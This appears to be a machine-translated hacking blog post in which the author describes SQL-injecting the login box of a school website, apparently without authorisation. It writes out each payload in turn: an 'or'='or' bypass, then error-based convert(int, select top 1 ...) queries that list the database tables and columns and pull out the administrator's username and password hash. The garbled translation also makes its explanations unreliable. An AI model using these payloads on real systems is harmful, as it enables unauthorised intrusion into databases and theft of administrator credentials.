Post injection in the login box

Author: Note
 
One day, I was prepared to perform a big test on a certain school. So I had this post.
 
First, as usual, you can submit data anywhere to see the general security of your website. Select an asp display page and submit a single quotation mark after the parameter. Expected result 1 is displayed.






Some Daniel has done some protection, great. Can't injection be done? It's hard to say.
 
There was an injection in front of the platform. The test was still carried out with anti-injection. When you see such a metamorphosis, there are various fears of the Protection younger brother, and the background is not afraid to scan it. Add an admin in the address bar to kill it. 2
 


 
No password. What should I do? 'or' = 'or '.
 
Result 3:
 
 
Can't I give up all kinds of omnipotent passwords?
 
If not, view the response.
 
There is a syntax error near the keyword 'or.
This means that our data has been brought into the query and is not filtered. Therefore, the younger brother wants to submit data query management users in the user name. As follows.
 
Submit data at Username
 
1 'and '1' = '1
 
Return
 
 
Submit 1' and return
 
 
(The encrypted md5 string is the password I randomly entered.) the comparison between the two results indicates that injection exists. Not explained.
 
Let's start to blow up data. In fact, we use common query statements to expose what we want through various errors.
 
Enter the username
 
1 'and 1 = convert (int, (select top 1 name from sysobjects where xtype = 'U') and '1' = '1
 
And is used to make the statement complete and quotation marks.
 
The intermediate statement is used to forcibly convert a program error to int type and compare it with 1 to report an error.
 
Result.
 


The first table section broke out. top 1 in JYS_Js is the first table section.
 
Let's continue to blow the second table segment and type the Code:
 
1' and 1 = convert (int, (select top 1 name from sysobjects where xtype = 'U' and name not in ('jys _ js '))) and '1' = '1
 
What do you mean? by comparing it with the original statement, an additional and name not in xxx is our constraint. The table name cannot be jys_js, then retrieve the first table segment, which is actually the second table segment in the database.
 



Enter the following statement to continue the third table segment:
 
1 'and 1 = convert (int, (select top 1 name from sysobjects where xtype = 'U' and name not in ('jys _ js', 'dtproperties '))) and '1' = '1
 
Remove properties.
 



 
The rest is not explained.
 
Finally, when I type the statement:
 
1 'and 1 = convert (int, (select top 1 name from sysobjects where xtype = 'U' and name not in ('jys _ js', 'dtproperties ', 'jys _ column', 'jys _ District ', 'jys _ file', 'jys _ jyz', 'jys _ News', 'xd _ Chushi ', 'xd _ city', 'xd _ Column ', 'xd _ District', 'xd _ file', 'xd _ FriendLink ', 'xd _ huodong ', 'xd _ Manager', 'xd _ new', 'xd _ Province ', 'xd _ user', 'xd _ User_Column', 'xl _ group ', 'xl _ systemconfig') and '1' = '1
 
Result
 


 
 
 
This indicates that all data is excluded, and the returned value is null, that is, 0.0 is int type, which can be compared with 1, so the statement does not report an error (I understand it in that way, but I don't know if it is correct. Worship Daniel)
 
Decisively lock the table segment XD_Manager and various burst fields.
 
There is a saying on the Internet that
 
Select * from XD_Manager having 1 = 1
 
All the fields are exposed, but little cainiao does not. It seems that only one field can be returned at a time.
 
Fast and decisive
 
Enter the statement:
 
1 'and 1 = convert (int, (select top 1 col_name (object_id ('xd _ manager'), 1) from XD_Manager) and '1' = '1
 
I have nothing to say. I can understand it. The first field is displayed and the result is returned.
 

 
Continue to explode, type:
 
1 'and 1 = convert (int, (select top 1 col_name (object_id ('xd _ manager'), 2) from XD_Manager) and '1' = '1
 
Result returned
 
A syntax error occurs when converting the nvarchar value'm _ name' to a column whose data type is int.
 
Finally, all the fields are burst. Start to blow data.
 
Type:
 
1' and 1 = convert (int, (select top 1 M_name from XD_Manager) and '1' = '1
 
Returns the first user name.
 
 
As expected, the Admin password is cracked.
 
Type:
 
1' and 1 = convert (int, (select top 1 M_password from XD_Manager) and '1' = '1
 
 
It will be OK after decryption.
 
Of course we can imitate the previous one. What's the second user name?
 
1 'and 1 = convert (int, (select top 1 M_name from XD_Manager where m_name not in ('admin') and '1' = '1
 
The second user name is submitted. Nothing to say. Not explained, not demonstrated.
 
However, I encountered a problem when logging on to my post ,.
 






 
I really don't understand this. I suspect that the Administrator has discovered it. After all, I asked Daniel to explain it a long time ago. . Wait for the next article.
 
A few additional Web posts
 
Www.2cto.com/Article/201111/110526.html
Www.2cto.com/Article/200809/29429.html
 
Nonsense: yanguan is poor, and it comes out to shake and cheat, with all kinds of rich younger siblings, seeking for support. Q738404558